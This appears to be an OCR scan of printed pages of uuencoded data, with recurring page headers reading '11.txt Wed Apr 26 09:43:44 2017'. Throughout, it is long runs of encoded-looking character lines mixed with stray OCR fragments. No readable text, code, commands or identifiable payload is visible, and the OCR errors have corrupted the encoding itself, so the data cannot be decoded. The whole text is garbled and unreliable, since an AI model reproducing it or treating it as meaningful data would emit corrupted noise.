1LONKC3HF’ ]?2"6& ‘AG 


E:C\$ 


ED&P*GPH_O?@6-1*0SASI 


"@’ ;C2SWI+LK<NBG@, 0: HW#<TVZB 
LSNS *] POF; VNS$ (VX!’ (?+D)A.HYFX 
# 5AMF* JTU *‘B5RCB (*MIZIB*JJ+SDG 
2K! SOBW’ 5N_ 
@SXR\.=@;-.:% 
E3CKN5=0/XSO: 
5U89SK5=:V0 (#1 


P(A(J.,FX28DI$!) 
(F@WV [Q60 (KF’ 4RL 
ROF*X5PW, W:\<E)= 


PS2*08N""0/#077-Y) D=1:,% 


*TAH"&<* [=(:V/JL(N 
JJ: °AT?:" [=F+3%%S%:G9IBBY 
H+C%SA_YE*O9H_F (M!* 
0:Q]WOJTE41D (&&6A, !W*. 
7(*7&*.7>!T&YO’ 4QJRWXU94 
‘&€BF32‘*1) ‘IH]4,;>ZD"9E" 


\8<ZK3 
2 


M-84ZY\3+4 
M-, =CG (LDW8T=ULPU, :K:0*UI [2 
MM% 6M: 9"—X@&QO4’' T’ IAY&_MS60’D 
MX!QM) D_X#MB-=*X9*LZ@’ #C *_K 
M@!"A253/*BUHSLX64T": YE#<&]A 
MP /W<T; VR>O=*X0\0#9. *YG/.NC+) 


Bs 


MT&P *>) ZMI;M2 ‘HL: AQ*‘E.RJ 


MK *T<) *‘;W["8_JMW, T&!KOJ\ 
M.Q>T/C_F5<6*L<2#MY%’ GA 


( 
20 


Ge 
E 


[7] 


U 


E!+0:3]:*)F9Y)NGI<BDX#P3=0<9R’ *5%!, .3UC""?5] 21 
"+5UA5"-<7%P_("P!) G#8;DQ:07?FAXN8 
#Y1ILR9)"8*°1M770SMH; )8*+6C-!A, *)U 
LIN! KK:NC<O2K1 
HG [<STU*=> 
.!B‘I1;@ 
MF’ Y&RAD-KFZ5 (<6U:L6T] 58CM-S1H[O4!’ !* *7 
S7T) 3+38=(Q[,1 
MXLO/-.HR3-91’ </-W, (2D\MW\=3*LH6+ 
D133@MQ 
HW<RLHI 
E>%SR.LPI 


E“GJ!@ 


E3M2*°R1-W8R&:S!;\QM 
RPS7S/#MWJ?+S) OOZ#F"& (A 
(6(G*\+S;USS$>**[J[E?BVS 
[<!C9?NX ‘O04-T3 (&'Z_"; 0<@ 
D53S80R;"5#T@IA"05U) &>, 
H*>:9U-\&P-8.U/OKW_56U71=>C\ 
D8264’ $2*>HFLK?’ +NP5T%8 ‘Bo *# 
L]2@‘YOC9%S1I<JJ) BP] +2C=#F<UAA 
E*>W"L: (YCKK=OQNE: 17A.W&: @OWO 


a 
E 


MILCL43>*<%;P’=,L, 3B59HK 
M*>@?L<5:S’+M!"NC’",Q) $8- 
MUP &.QI\68 (Q[/NP7K-Q; NX1 
MLWRVUH; 8_HX8_SOZ:RWR.FRF4 
M(W+L[1IM/E2L5V/VBtA:6.=\4 
MA9[$>9BP-FS;] 
MK &I 
MR) #.5(R,,"J; JIVB6XAG2] -&1 
MFY"=+=X\[H86)’L?1(N,R>;Q2S*P 
M*<XQ[Z#B%3S-VJIG&<LSR:J1L&;N*S% 
M\_OD9"V<%#5+3R?>,Q0+8GG (SA/Q2 
MKZ4?G8WP7F*DAC’ K<\*;]\(PH"U! 
M3>%H<; &R<Q5@LE 


ry 


D 


ay 


x 


M&X"2K!OFS2KO5X, _ 
MNTAID’ 8&F],9\'1 
MKYK&5:A0Q@6"QP_PY<U\+ 


— 


M!71>(+ 
M2A#-ZS$ 
M[!U+TI) 
M&86!%’ [Q>_MCCANBT ! OK 
M/VJ' V=U>U"K7RLT8DFJ&60N 
Mé&R*F) =[YG 
M9P *[>PTM]C7<90Q]1 


“’R(Z&5*. HI*#; 4d. 


re oN 


!7 


M[’OG?1X 


uM 


M=1 


M, .A/R:T (5<5%L (2*5PW 


M’ OG] 


M"L\H[$M019’-VA1 


M/VE"NV:"R*:ANP1 


)< 


ls 


LJI-F&RXC<:0& 
LFKH731=' Y#@Z! 
t++OSJ\W. 
+749+G(V 
E3BXO/%S#@NM_.,X1Y>! 
_13:N4S<H4@, Y ‘*>@CGX"V!L*) JQ* 
L‘4#.9U36+0G7I1N4&6B_H81 
EG4 


: GNG*2LJX2.A (D#JC&JIXVO% 
] PX] F8#E**X7.+M=! IBXX.N 
EM3ZIDV) 5WUN2T] 9@VBEI31UQ%Y; 
: LYSVG) 0 (24° B&#ZT7>) 3BK2*° SEA 
.\-S#X-.; (QU! !HN8S-V1R-'W, *H 
US<L[Z! ?&_L&K9S-<2**PBBV9ZMX 
[>Q*' 0) ]D@/K#8 
tF 1CYIMJF>+B*S\IFC2#Y+W\1IC0; / 
(U>%$R"1Q/LA; 93U<_B[8; 97=7M, R1# 


M:3KX[@?USOK!) IFP&P>>CYD30H>_?WR<>S[J‘*C[ 
“_6=@S?<R\"?2? 27": \!IG 
ESGBYX\7VCL2KUKB7’ 1SWO, ] 
EH"& ‘+X2=>,A;M6\]BOHG 
M& (J.G!X5PB8!Y@SO3"!) $GB:"1900D*S ‘U3 [ 
M*6<1*[*L:;DZLK7; FP [M3’’F<‘D:X-’ #*/U(4S] ‘) R6@, HU#DI.DB, 
8\=2 ‘MDVTFA!/8GO:*PRSRDO:’G,, 
K8DSCU/:J%FUU 
#W5S3S=M8<M3>C (-#&RSR‘7@P*0-3; 
\’ [V; 9_V<+XV/,%*5.H% 
E=G3F]JBB. : 1U3H=WHMYCTSSSYV_L%Z99GN/B 
>UJA* 9\ IVS; 4@: ‘UGU6S8G9&+/:5L&—-M 
L"?90UUXP53’ O8A7P<CB?!XH#4IRC!)7, 
MC) P**!-V2@T/8*681: Y=) U.*SB’ MA*= 
@X3B (*F#-*) N4W/-D$311; “WV 
MU=K]=N; E=N:+6AFN5/4@:_65P41UC9& 


E6D:SHDOL+, <F4 
M62'' , SQ@4"&&BM000%, +$Y%1% (:2,S5*1685@. @+:=*@<?07CZNO*/W:=/70M> 
EM5 [MO3K*3U, K3FN! *29D?-X7 (L9%&/=:\"' [ (Q-4$13’ W<7CIVD1Y.+6@ 
M30 ‘AAG! JD, X3<) AT<3’ &1] 5JY2K (1", "V1+=6*G+>YWB* (Y_.>[/".\L?Y*1 
[DS;RS_PSAAA>%!2% (6R1] 
MD .ZA; $S94;=N] *K1+KY[M7MT7’S[\);\ 
[T; Y/PR(\S-’ F:T%1U50*KOLAT [; /_] 


tS@OSICL*<X>TJI**99*DX\5"]D) 2&1 


U-L/*:C[WFCBR>;H**5F+DL/7!PC7AIS 
P*<\F/_AXVF *2U, .?-P?Y; 693DCYNEX0?V> (% 


R) 6=_S4;N 
C"9#:9!TIWL"2! 6OUU6 ‘OQ 
L=X+SN8VV (\"NHSEQK-ESM *— 
:D*‘&EFDJH ‘K*7] 4&&V’ WO6 
(*?"YZ8&85UME>AS 60 
H5T*:V9Q*%9+!C11/3.K] @L5D 
‘ 6Y*™H4 
DY’ *#MOX-=Z0 (7EX* (161 *)+ 
:Y¥J]:Q‘N2KIC; IPX<8_H:G1"L 
HA: OHJ[Y; *‘_S=J@U0] 349T9# 
WS?SB*%<>-1 ‘K43=0\8 


% 


H3’8) #=X"&4 [WSZJEN 
L"A!O&K/_=% ( 
(PL2F@$Y=/Q@E-JI 
L5[%O=;_T6K&1>0Y_- 
K6W50RR@@>DCXE/ 


GJ 


ROH"IX?.10)_D 
W7C6[U?2ME) 1 
KV?5J.S0’ &B7R& 


/78):)L7,S?GFSY#]$*"(."CD_[+P] VG6LV40%*Z, [G3ULN&) 3DL&6\=FOQR> [ 
M3_Y>)\\*D) 7/UHS_M>M/Z22ZW1.7FIS"? 
.)T4?_27]*.HI2\JVOJR>G’ B"<’_O 
M[WNCBUK]/K1P; .#[XU+(,#"!6B>>0=) J 
MZ, ?2B6DYA (6) ?*_IW@A!7?K>X[_%SGF\\ 
ML>:*<F@O*MIK"-\41_*BY>@S,D.2Z?+51 


</5&J:,8."UUL@SD%$*RXS<’ H.C6B 
W%-5S [VH; 9MAPEZA432M9%! 9%/]6 
tH!’ ! /CN24CB\C7+<@B%/1I*.’1GP\ 
')G(TCS$0) RP=!’ I=F5=D.*5(,_SK 
<’*\_Y] [=9SOM$]H:0=1. (F[?(:G 
+, AS,’ /G?&H[’ 6E0=3H; F+OHK] #A 


Ge 
Ei 


“)SA"1C*7-UMI5F+60$V3 *C 
E,Y)"10) [SLEN=GGR; \.GS&NMV2* 
EGD4\BVLRU0Z?/30> 


11.txt Wed Apr 26 09:43:44 2017 11 


M.RFC<; HB!O-L2>3-_Q! ‘\:"4GS:V: : /W@P4?G]NRU4+X<Z1KKD_@8#I_&H3H 
MO] %*5+) LAQ"Q=1 (LKDZ. 493‘, W39H30.GY&G./:205P. ‘6D3V<ZH#.GFLOWE 
M"/09 (M>:Y?PDY>@%G$; 2/_#CTSKKU; C<H2SBZ) GAU’ , #47Y) Q; 4T6ZW1:M** 
M"7*°S *] 5@Z*°NC4XZL! XMR5*=/=9:0; O?7E_O. #E’ +SOUT] K *4<\_J7*A* QEEVE 
MSV&DZ9L3Y 6D) R<MA6<GH (LN#: 4F<DRI6&S\ [OYIOUT3M6* . H#6/@\ &F#-MIL 
MSV ‘W-B& ('AZ86437YBD=NTY"—’ I20RRTSIM9Y3’ N$3]_&*<-=SFOS40YG, ZF 

< 

0 


lone 


MT ‘#BB ‘=O9%G\3NI’ (; ?1*?G2R9B\9S$-O[K.C@PZL_<EI4K#>*90LT8&<, ?K ( 
MGWH<PSWJ#Y[) \*DZQ], ‘, JIG+0!]&AJQ. 90X12Z’ @LMODI] &M*X9*4:H[.CL2C 
MOU: *@] "N*KHZ010S_ DA@(*’ G<G (W-BXDBO<) TE@KNV, KX (I<K099$?Z0<F;0 
M93@R<<, 9UZHO<:!#3/29I1PQ5’ UI+0) @WOR@\ON9!S]CH?1\I8R.;4°X3>) 2". 
MF4:]! ($\P1S, /QT_-9@ *S## (U\D@UUX<ZP@C?*S!SV*09\FTON, P<3RP’ UN? 
M":#M#PHERMV, JR, 5*$[L!2,)Jd* (30&R@*]GPB’ *<#6JC4R>RE&-"/+NSY?*2) 
M\:#L!B>_NHXUO, G=7-?’D]_C.=8/ZGOTQL*?7(?P!WVJ*"TXF__@. .0B((&/ 
ME3F°1SU.2?5:GUCFFYG-] !S$YU\X>;N(9*)B\"B7P:P7KS*OH=7B, * ‘MTZ21-# 
M*#J]/3<!"21, #-LASG7VTCX6/VW1, 9B*]\K<T’ 44YN8LU1P’ OTS [ !E9PXH) - 
M29<*+ (2T6X%; &C3X#E&F+10\>4//<X\-8SE@6*K!H9I[;)) :S_L-#N] 9JO95IU6 
MJT-ME&N) Z76D<M78:\YU.=T>JMLO=UHI: .=H] >?S88VAT7’ .<G’ 83.,E68]=)V 
M)F&\*!’ \/ [GDR=OF3; (U\L’ CSKFTH49-164ATBSWY!.:0.>!. (>M<LPU) [=68 
MSL’ 20’ #940"&' RHBCU45 ?<MKM1GA417W?73=BA<’ ILF+DCPNOFFE? 6&1YUK. 
M+C.T=+\GWOAU ‘#E2]J:C6!RP’ #TT\/01)N]BMF_(\I5?TF#/0P [KO]<B*AS9 
M&X_32227/E*7.@97\,RR"].XROE2:7] #+411A) S1*"YAOTOIA]H:$*KQ@]>’ 
M68"U@; [NOZJU4UHA’ (*73P:4+V?) "6&W! Z (+4+<39RN[*96) IMZ<V<\U*?L] 2M 
M‘WRTZW5\F [YEDEW; UASR5J8Y+UODSM3ATSE [S%2<NY&.%1%*) 9C7TI3°#27 *2 
MV *O>*.PB) !\KMO*?VCOP3P ?_Z>XT3K47DB4HU3’ +; *?XO=[+EX] CJ (2U#H-A 
MYN@A]; [2N4) =E. Z<; PDE* FADE ‘P$9-3.,0°D?0"@_46Z@B@&) G) 04] </>/N@ 
M‘VI]DRDK’ /-Q&72N&XENOC9#>J] (# (<F<<+2 *"N? [HCO%3Y92N07’ 8\!&L6Q 
MN&=R-BQQ*, AT?9_"O0FE9: @4%8ZEY@ (; 08; 4/YY=: 3*@’ RASSL*V+5PS*T#NU 
M] [K_Y/ ‘16 (UUP: V>?5W3/#\%EI\GS8JC12#*XCO$’ EJK?6>0! T+RUT 20=+NU 
MM.’ -S-DQI+, #DBCV#6, RSMEDTV3&<FESPGCIB@*Y [CDDGU& *:0\ *3#4>C*IT 
MYKG ‘0*OP* \&W<<O0_CF!/1:S"<;Y8.\W/ (U@D#$&&45=Y2;P; I"BSE263FOQ [I 
M6Y:GB>8; <(!<W3IUYT!, RVK*5>TNDC *3>[:;C3T[Y’ [?L2<M?YIZW4.M/O*_ 
MIDL=; Y1V\@P5DVJd[) MU\0%%?S; IN] H2*Y/F8J[L$>+.L[D=:82]XN==,W8_R 
M3QZ-PGFY5) <*’ *VK#; #*9.56N[5"MT<BBJ3KS$R) 5"@<6A[TP"LWt+":&; SZH_ 
MT ( [EUNVJMV] 4G8C>; *K, \\60/TCS<G&"RN; H&EN+0--SF*T3VE6UG, #_7S7,) 
MGL?Z) E\5YU] \] N4M5BDS9ED?! *:1;<%!,W\K?73 ‘Q6H) 5G_[FZ) -$<6DB$R% 
M+5*RZ!9’ ID5Y’ \46N] 23. ] 2?B>; 9SDY*K6NS=NL4-N&! ) BZNIBPON: Z&8-9\< 
M’ ISLO3U1V.*&Q@’ /\4 (AFR73J2+W<8XSO7& (!M+UU$$OZ: 914%; DE+4HVAP SE; 
MJ’ (U2J0/U, O>IM*=123P] *JIHD@T7L; Y"UN\;L, (SQCC"-?'’ 3’ $J<JD1H) ’MX 
MSP_UN@104\=) +F+*, LSLGX@<1C6P.#!W+8WI;.));:\XAC=C-HF&B5LDOX"/ 
MO@++_LSJUL4) I! 42F+T] 8BFE] ]<H&$3L.QBM/Z,+/!* (YXITDSN&J,V90*** 
M],’SYG3Y&$*P%=:.:\7V&Z=&. I LON_; X8J:=]>!2NP99#W92\VU; #4"#% (31 
MN73%’M41C\8V!X+*/CU!0Y*OURDZT8%3M*Q10 ‘H<8) 9&AXX] X@X+& *5/EHVG ( 
M, PC*CCME/44.3TVV! KJY"\HXWR!’ 3P [Y ‘BCTO=P<-%VH@HK*122#5[3’’K74 
MRR; \N*J>/17; +B’ Z\T’ FPR", USW4] 8H>Z (OE>2Z.K7:.1SP1#O6KHST\IPFR" 
MX8VG, *“-==710UT) N=G!T\! 30RO+TT\7SFI*XGKWCR9>Y.C7KLHOQ*?AS0 *I7 
M5* 9BE?@<?4Y=@6P-6XAA41DYJ. YS"FFEX&J]FC&JA (VE122>T&’ FYC@) S&T* 
M, 1L8DVX0?:BV:DWU (CR’ &8SJ/%1V2N(,C_!:5 (OWA<@GB) !‘G] 2W6.R*-[/* 
MC*5-—) XISC-V*%*°/T/</"X (#9Q08X1&IROE>NTM33RZ ‘"+7RO09S2YGX-64°H 
M4IUOQT’ ?N#) L] RWPKAIB2NK; NLW ‘4 *=Z7YO&* (AYG"2$LP4*35S&\ (ECZ=K.Y 
M]: [#SL2; 8>G<QUW) S; E<LR6, <Y@=) ]NXOL+, >6LZ?7C"6*UI=W* 3) \@.-1MX 
MO. *(722?&'’8!%**. TZIAS) WH’ R, =[-2KHPF5 ‘"NC; ,DE]+1/S5:JS-E, 4DA/X0 
M*\ :A& ALC=/%T-3[+58]AEKB]N.2>.,K=A@, #4:$=*; YPPS4GXC’ E@2[\?_! 
M8Q0C/MC70?7L9:C<C3 ‘AOU [>%/_[’ WY (O/R(V9I (Y>’ Y[T7*_M/OU (GWY*07*R 
MOQ _WWNX]J:M7NT?]H]?[_]BSU_AY]*#PH*X: [; IJD2] -T5%=U (2YZ (_=&<K" 
MOVKW67__8.]D) ULL_N’ 3!,1:U4U"OXJNDE_; [VJU7SW*0’ *TEP@>L"71A4LR 
MK2I=U-70X9._@X8, OWB%. ‘DH3+3+S5?\N\Q*%[2?N! !C+3D[Z*P;1;\C) @-#!? 
MS5PLY (,W+U_ROS5-SY3D51°15S0*5] “KSN8F ?GKPH*; *: : COCU45K-NSJ@*+ 
M; 3:OJPT@*/’S_M’ >WM] KZO$CM6’ 7MEO] 37UHP]F\*AVTHPO_*V#+K=15MU9C 
M*;=CVOWI\+_T1W>7WG9YM?NV;_, &82?#S[O[) +HQ’ AB.V7) DKOP, R’ @P) GE, / 
M\K5KYMH& \_U7A?’ ICZP]EB2AHC! .3F.‘J3:?, ?1=<?1$8%’RS2: [WZ/5:DK[! 
M* 75EL2) JW; LOC4P%&85B.Z&C]JI:S/RXYWEF") JP\% *CJ_&M, —] CO *& IN#589W 
MYMTH] BA<V3S8.4F*[C/=#*:L3) (!:E(‘*8]@N7:,SQ*:E(’ EW*@H9.ZL’ 1<5P) 
M7K+9G6) "@ ‘E=50H’ VH6. 7LOB>@F.*G! DOQI3PH*8$]\D"]9YF*HG/$7SX9[B 
M;H‘I8\; \_=S3@; OGL&EVO_JVO9T%0U_0!*B<114S2SMH/2 (WSLU=S$ [%.1731 
M) WOB5C>1#H@: 9M—-.-<.3$, ]1/688/XX770&<4E] 2305$?<UHA: ZX-PO3K#0Y 
M=4V&1>5._** (32? ?7LB91#NK., ROTHOXULHS#VET?F65_:S.@20!TS*#=[EY.S 
M?%S8NSZ!E:<+EFEB: [/$#U"=2"PFA[D\#E&I ((N(7/ 2?Z_%5.," 4N-EP\F (+3 
MLS= (3+_"B%/J+S=/&, 2?V[8L&, , $=&\; XGB_VJ) 4) N3WUD34=\* [H*’ 4K_9R# 


ole 


E 


5 


11.txt 
M_VI29WJQ.S&1*) A<AZPT5 


MS3-3%V\_X*F_SG25WJZTLI6 


MS=SHS-US ["=A858=21 ‘9DJ6 
M>3]B8ZVN69>.HZ&%/\2?S751 
M-#!ISD!<;G3%<83A*N; &8N3 
M"=*2+M<!*1S-GGDOA-HI;5$, 
MS3N*\OR:SU:1 
MD+D::Y(K,E.7 
M3#18@+23ZKF \ 


; ] LBNNG& 
R@ZF="+4 


BJ: 


MTK+WSGP/KS>XL4-A]WC-?TR’ ] [ *5T9U 


M@6DDM[P) $9-6B>XJQKX.’T_%S&J; “PL@ 
FO6DT?1I]31"%9 


DAZC4S%=R] -& 


Wed Apr 26 09:43:44 2017 


198<\A*’ 


12 


#2 (SVY:IN/C/7E(SI%X. .*6; @ (BHOMK (3H_&++ 
OPP>@6R‘D?8>,M**] PCE’ 4SB; 4w(M 
YSJY 
‘K,W 


, ]W\G=""U, EQPY () LXR\YLUX2 
KSO0_!V#]<=6U*S09, 1U[*OQAY 
DX\-TS ‘KOPPS%SC40A4&:,>: (* 


B[SHKP, HA\TK’ $&1S’<:2"S—SA) 7V#RTF6079 


19;P@YS1M8,>-SSX@HS*\6 


1Y9; :A2% 


MY*AJ ‘INLD 


MI 
MM 
M:Q@;H_"?ZK!F)VAT7Z 


5 


UOAS SMOKW<WMGK= 


M6$ (7P&6RI:Y/2# (3FOKI/IU"_] 
M?I?_]QL\SA[/.QG*50X92+QHA 


‘FO 
M-K65 


H8,KG.,%%3°CG><4K3N4 


LNO<, 6;N.\KT"WUK*S"# 


fT? 
.>0/Y;5S*4;H 
TM, K:KPJ@O[YDUAP=I$ [ 


¥ 
4 
M7 
iS) 
> 


uM 


!“9R1D9, EE#24 
MD-VS [G*>*5&RP’1*<M?) * 
M%s%) *E?’ 4G<1E. 
MDYT<#D6Z\ .U9 


E@*") CO9 


.*°STE&_\GSSLTTTYW! EV# (D ( 


A#/5=FA"*5H[J*#EGRT&+]? 
EYVP3-+0G7*B.=@/DW! ! 80BTAB=AB.<<4\Q. 
9C’ !#$732&8V; *I-7 (RMUW. ; SSOIF/R?F$’ 
, HOLITSX%2318Z&$R*-9U3I-DOKV*! L/ JPON+ 
K?5.7] SMM#N-SB/\N-SHMLNMC?468M!Y! 
M=* ] =UOFF-YV?1FB3AM%D’ 607?1__.’_<ZWSG/MY"4-UWZCE) X/V‘1G7, EYN/ 
E>3_U>VD&*?_[?5ZKOW, ?_O9J_7:V] (_. 
EDB\! K+WU1S720M#) FAGA (LD%937*]U7CO* 
L-1-J1!IV?]*V") !6?7MOV"@M7?@4P<_=59*N?/N*=H/K?\X*G? (_[[Y 
#I=RO_*L’'N7__U; /&}*) 800\"OT<8W\ [\"T:_G?; 6VV8 2X [#S=; =_+_6SSK 
RJ; AEUAU77G; *+S4=_’ R<@/FZ<_9%]-_4'*! 7KN<*\N 
MXW7) >YIY’ Z*&Z"7K2E"LCR9& ] JT71 0SAX*ROJ2>4GHT<X* /4R4] 91<71CTS" 
M>SHSAN44YAS’ POZQ2L[%5ZEL, FLZ#MY! 0) NNBA] @*QK6 
M"KU ‘-*/&NQVG@A7) ZQGO0OSZ\RODS) 7X) "HIN5?+QVDVXM\%BO., *[+3"G_ 
:7H*:Q4R! (95U?>Q’ BY [;=@1; 9CO?TMN1]+C# (4U2G6 


H’*/Q@[P!E!LI,: 


PT=,BJ 


E7’V’ 


R@1 


BH 


L-?I 


R6“LUM; 0O-UM3SC*= 
‘0 
]]?2?6.Z20#J6NJZ+2M 


*GWCE9@[QRA7><") 4] 6; *<’ OC-] I"34J\4UV1 


M(,E5-GVC:>1=.’\*I+U3U+T 


M,"*J[5[V] :0=) 
MI&-YW*UDWS] [N?0\&-_G<-I 


MK41S@Y9Y\_X9660+NEPJ[U ( 
MS) L5&Q=: ZW#78N>EHMSO+RL 


M, K (3X-FT/E*ZJ&"0]DN*, ,> 
M*‘NUN5S ‘9M *‘QW] 5I1T_V75X= 
MO*EH, "FNS\7O@L-HD*%. 
M6@<’D.<OK?*9+[;SS 
M[;8L1355,<.S4YF’ 
MT46%_20<D; 
M) 9N@K/+>JYOD) ; L6O>NSD14 
MI 9CWAJ?B=9H8WDXSEN: 
M!, >AY<+F=5X0 (5TXS>9GJ90 
M\ [UV3AM*U42XRWRA95JQ, C1 
MU5) NT7P" (SR80$1X:UM<_PP 
M<Z9QBS136AFEZ36+(YT5 
M76%SV&C/>/.AG:UY9T\13 
M&=CP; Z6$<7L9*EY+0YU (C%< 
MQU?,’&85SM-:938L_(Z9IRJ 
MH*+L% (VWDI 
MI%.:4\OJHY 


!)R) (J "OFS*IC 
'FP6ZOBIG@B3JU! 
LP, XO¢*212 "3 
MU+VH=P1+4CU=.FQ8HL1K*EG 
PV/.?WO>M],OW\= 
M@HXV_/%E-HS>A8:,E=RPJ?; 


M*‘QO!’ 7 (O#H[T#E& [>\"T>GX9# 
M3% (*\.3P2) OBK8LG (F-R*\W 
MCI*D; 87&&1@6R] >*’ C2FXM5 


‘\R 
/TV 


17d 


ES$+S:YI:"/XS/>AEW1+ (*SO->=S+@S$B5*\%4KW’ 2E\ &5NDOA7NWLKUILN 
U_OK: ]<%78 ($,A-7SSQAD4G/2U3X&#CG: ] 4; *<\ 
H\I) $$"A:BW]*:R78[/]RK*IBJ] ?0=1 
=K<-RI[9_S=Z2:/\];-_9?]_D@8T3]_[_PB-:=%#Z, W="] UST: FWM 
5]SX’R’VS76&FZ@6ZP [>25 \#JQQO>W=039%G [:HGK46N* 8EI 
PL"HC!5B<:L. ‘Y>*0?50;%@=_*(, 
MP? [308.3=SO4X2N@V5"2/MS03"2<57<<XL’ \WG3<[?1?N-, 050; ZV, ] 


K! 


KMAZ*#, O?W* 
._GA3 


KSIN<: [UL4ST*CG, ! IOQHS, OOM?JSO+NI$; :XR[N=] 28; F06 
#D<S$]8°*9 (ZW) @I ‘CLHRAQ ‘*SN!>*‘BDNA71<=N*C 
*&+/8P:YE<&J&+99’ BGI ‘CD02! 2?"1ZDFOH8M 


(&Y*DL@S/5U 


@1FO$, Z>RF!%) >BSSK@JU&*2UEZ *M*5*/' -FOVK 
ES7KZQ4K] ONOF"/6] @) 2?’ : 9U#?I**_OZY) <C 
R] \*<62K6S)/_9>'*\?'D!))P>*+B?C*XWL*Z, 7A\*>X?L< 
[P=9.9:.5[T!NTF-9) U]V\.850M_(=VZUZ>7+ 
MIST! 85#S#YZ*K: #3A5* “HCGQ6/ (6\ ‘242MSL.1ITOS98:4%90:CDOQ[_.2S[?3 
L!S$\OZ; YAS4 (2:07) @#*6X:\S"_]82;'U 
:4JV] ILS3GGUF81YFSF; L= (8M3&=8ZLI9A 
M*_N6\RD@)V; ?4YHS>+V5?7TDK] N=[’M.BY%=Y6DBA>Q*/K) 78"?7+R41X) 5< 
!*Y¥5CPT_6 (*L$?X_K!G",0] 


P_>O#7U,) <* 


OCLEA@F>580083\=/"Z*‘VVNV.!O9L_*W>4PL4 


E.9F&*\[S$&B5].K_2KR2FFO* ‘A; 6%; @6WR 
K87Z0B7SPS$V0>’ CWOZBGPOXEQ2,’.5,1Y 
\VD%LTITXU/: *,MY[) GPZAW’ YC40 *=0&@, ( 
RI< (>BM7 ‘84@Z\4Y+ (K/*1&<P8/3M0686 *?5; &LL 


0+* 8A20&RD 


) KUN<: 8; &? 
8KS+SLCS73 


K+. AM6+/ZV 
2=@J1V [ 6WW 


OJI) FS=+?= 
KR9[;DV\D" 
G>. &H!) EM ( 
=X$1 


[?G>KU*_7U 


'N*, 
1+1VLW?:G9 
D[&U<3\8, 11 


WOD, - 
LSFO#8<>IT 
USi=HT. 8 ze 
KM4Y55,+M1 


H\5,) *S8Y4; 9AI3,N’ YS#B5] [-Y 
BD&Q>JBK4IUS: SS [7TN*#<>9"%*;,".9EU: !5M208< 
DK\DEOZF4) W?2A+! 3A%4P=5, EF 
DRGI-OJ#64FT+\LO 
R4E99%.FSTM3R<>K"1O*TN>INFC 
K:)) GGZ*U]'=YS.?+2.VSG) 6F/’ AA: RR-*-9Y?TD 
E+VTG9D=0; I5\JG1-A\ I3QE_495[ 


[4KGZ.IPC7Y 
H2>2Q0YY+S#1 


Z°>S)L~77 + 


KHR"; G2>_*2CLNZS$T-*?=5T& 


LS [V51MNOHNJJ6ZC6G+, /7 [OBP3 ‘Q>M: ZLRGG"T7Q> (@W>E_ 


:XL_5UGR-+?=5XL4R [9L&@J) 
U) 8?<G?+TIW6FE3S; 0; &*:=8> 


KS 4 eo 8 


,>/YB6°JAFK?_?UDQ=] /IL!J3 


M-—' 9GH] Y&KG6?3B?1=1%&; \-XS6P4Y7>!"LA-, 8D=*?+’0;ECQ’HC*C.’XS 
M&TSRSK*\\) *RUX=S+*#WE4YM! XKY; BLT: 7?Y*OUGK_?VN%ST60X—) H<7!WD 
L*-:$& @5X_L1SX] *SV= 


E<I* [F12Z) 0 
] RZ4EG2FFE8WO%/SWYZ=D7! OL 


EM6J&:>*?[5SNSN*9S’ [/\81? 


@OFS,OD#S.>SST!2K%S1YK?<<%NU 


N 
\8 


‘56 


2- 


P/BN2U# [VV (2,W!V*:#10016RW3 
K&8-3:_7‘NI>WIVMIXS:V 
U\1_ M5AK_T<$XH787;,"([\Y]O\5#\ORVB/S#2 


CF 


-0 
E9 
/2 
SR 
US 


11.txt 


MK7C+M7F [#0 
M7.D9!1 


= 


5 


Wed Apr 26 09:43:44 2017 


]T\) *NASWZ%)B 


M3\’ (J@+IPD 


M7SUW2] !1-# 
M5] V;=—-4E%@ 
M"C) *G?R<;K 


ma 
ho 


MSIU@S?CP.O 
M&&_9RA4 6KH 
M(.NLK*B; Q5 
M=Z*O[!&9. 
M?CCX;:5./] 
MM*76*(VW]. 
M2?MAFZ\FB" 


M’ YSXH-HUJ 
ML! *:)B,5[ 
M*FG+Y<9<:L 
M["T>O./#+5 
M38SP@W! SH 
M; QM1T_5U56 
MW9\KFG=,_S 
MXW!MEVH. 
MI48F!3__ 
MZ>' !RU_ 
M)_3; 


R3 
9"Z02 
UQURS 
M520; 4K; &1d 
M; * (NBA4TZ? 
E7DD 
MRF?]>%91 
MV>-? [>HO 
MJ_IMSH!4 


KQ 
?< 
KL 


MG%0?.4"?D> 
M@63JE&8&R? 
MP 9M7N; XV"\ 
M+ [&D**<E+\ 
MYROI65\JGY 


EG6&VE" 
M/)S_CG_O1Y 
MFG (ECW (5S4 
M618-HIBMIO 
M(.TS!\*N([ 
MA1E.01$8’CY 
M,P>QK] (' \/ 
MRA:D’ %’R\I 
MJT: [* ([RX 
M*:6NSL\CY 
M,Q/\?#S$* 2K 
MP51"M@1.2S 
MRTHZ6-(1**% 
MODOSXJALXV 


= 


E 


oe 


RN%4KZ 


M:; IBSI?>3IMDM&# * ( 
R6-AG\X8 


62B=*\' Z=AF_X[CK34 
*8>;MLS+DQ08"44 
-UKRJ86S3=:F\116!1 
O>] 6R4.K=%2=, G69! 


47] 
LGB 


BE 
Bh 


M_(!R4Z1AT<Z?_Q-4FX+]_054@.0B/S<WN 


MN/ *R2Z<WNB=# [Q"UY6 [P 


ELNQ.B10-% 


MHC*OW_\WNB; *O]MN8_009Z/3N]0_O0\5S\_A/] 64#0/T) F*44W’ SUB*7Y@B 
E@Q]_77NG3 
1EZ8 ‘SHL’ 8=1)M:-8%C!;G;K7*_[[ 
+ !MHA5 
MDQ? ]MYJJ; >ASSHO"DJ97G?05K/,-2?(<'C 
+1B</HW, 3& 


LA#,<G:Z1 
[#JQ?WFU 
:"HK&\J* 
UY 2041 
!UZV; 66H 
!69!LYC@ 


‘Pp 
)< 


[ 


[G[/]WoP [ 
7 


Y92H/+\.-;"3/+EAZ94HY 
2?&#LRDTE5S5SRYO; 4#1_# 
[DDVSCV%,N33[O 
P936*J*?\MO00G@2) [\W 
[L; *“GEV=] 6X%0) ]5G"N; 
8>SZ?PCK] ‘YZ*A#T 
E6"2_—!28W’CP 
OEN: !Y@PT)R* 
$<HXL*’MCD_-.FQ:**+ 
Ol; ;,C4_ 
L[2M]>$ 


P6 


P+ 


DLO9XU, +OS*CK\ 


(=WI*3"/5SQ 
D>P=+0E, 2RC, =HS%RO4 


r=\ 


E@4<&6KE/JOF/LH81W1 
UPO*’ +5S>ADG40-W, '’MZZ 
Z&=\3ZV"KW"GGOJFO0!] 

DSRWTHM[?+[V;’ T9] _O 
: “HOO6UKZ"2_@BSS$@%5! 


io 


fo} 
K 
Gt 
bE 


